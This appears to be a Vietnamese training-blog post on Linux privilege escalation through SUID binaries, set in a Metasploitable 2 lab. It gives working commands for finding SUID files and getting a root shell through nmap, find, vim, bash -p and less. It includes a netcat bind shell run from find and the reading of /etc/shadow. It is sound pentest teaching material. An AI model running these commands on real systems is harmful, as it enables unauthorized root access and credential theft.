Leo Thang Đặc Quyền Qua SUID Executables

Trên lab Kali hack M2 ta có hướng đánh vài distcc v1 và có shell (1) , sau đó nâng shell lên TTY shell (2)

[1] https://cehvietnam.com/2021/03/04/ceh-v11-oscp-v2-target-metasploitable-2-mot-bai-viet-dai-bai-tap-tong-quat-p2-pentest-distccd-port-3632/

[2] https://cehvietnam.com/2021/03/04/pre-oscpv2-thoat-shell-upgrading-simple-shells-to-fully-interactive-ttys/

Bây giờ là lúc tìm cách leo thang. Hãy tham khảo các bài viết leo thang qua SUID Exe tại đây:

Linux Privilege Escalation using SUID Binaries

hoặc hướng dẫn sau …

SUID (Set User ID) is a type of permission which is given to a file and allows users to execute the file with the permissions of its owner. There are plenty of reasons why a Linux binary can have this type of permission set. For example the ping utility require root privileges in order to open a network socket but it needs to be executed by standard users as well to verify connectivity with other hosts.

However some of the existing binaries and utilities can be used to escalate privileges to root if they have the SUID permission. Known Linux executables that can allow privilege escalation are:

  • Nmap
  • Vim
  • find
  • Bash
  • More
  • Less
  • Nano
  • cp

The following commands can discover all the SUID executables that are running on the system. More specifically the commands will try to find files in the / directory owned by the user root that have the SUID permission bits, print them and then redirect all errors to /dev/null in order to list only the binaries that the user has permissions to access.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
Discovery of SUID Executables
Discovery of SUID Executables

All of the binaries above will executed with root privileges since they contain the “s” in their permissions and they are owned by the root user.

12ls -l /usr/bin/nmap-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap
SUID Executable - Nmap
SUID Executable – Nmap


Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands.  Since Nmap is in the list of binaries that is executed with root privileges it is possible to use the interactive console in order to run a shell with the same privileges.

1nmap -V
Nmap Version Identification
Nmap Version Identification

The interactive mode can start by executing Nmap with the parameter “interactive

1nmap --interactive
Nmap - Interactive Mode
Nmap – Interactive Mode

The following command will give an elevated shell.

123nmap> !shsh-3.2# whoamiroot
Root Shell via SUID Nmap
Root Shell via Suid Nmap Binary

Alternatively there is a Metasploit module which performs privilege escalation via SUID Nmap binaries.



The utility find can be used to discover stored on the system. However it is the ability to execute commands. Therefore if it is configured to run with the SUID permission all the commands  that will executed through find will be executed as root.

12touch pentestlabfind pentestlab -exec whoami \;
Find Command Execution
Find Command Execution

Since the majority of the Linux operating system have netcat installed it is possible to upgrade the elevated command execution into a root shell.

1find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
Run Netcat via Find
Run Netcat via Find

Connecting into the opened port will give a root shell.

123netcat 5555idcat /etc/shadow
Root Shell via Find
Root Shell via Find


The main use of Vim is to be text editor. However if it runs as SUID it will inherit the permission of the root user and therefore it could read all files on the system.

1vim.tiny /etc/shadow
Vim - Reading Root Files
Vim – Reading Root Files

Further root activities can be done by running a shell through Vim.

1234vim.tiny# Press ESC key:set shell=/bin/sh:shell
Vim - Root Shell
Vim – Root Shell


The following command will open a bash shell as root.

123bash -pbash-3.2# iduid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
Bash - Root Shell
Bash – Root Shell


The utility Less can also execute an elevated shell. The same principle applies and for the More command.

12less /etc/passwd!/bin/sh
Less - Root Shell
Less – Root Shell


Performing privilege escalation by misconfigured SUID executables is trivial. Therefore administrators should evaluate all the SUID binaries and whether they need to run with the permissions of an elevated user. Particular focus should be given to applications with the ability to execute code or write arbitrary data on the system.

One thought on “Leo Thang Đặc Quyền Qua SUID Executables

Trả lời

Please log in using one of these methods to post your comment:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Google photo

Bạn đang bình luận bằng tài khoản Google Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s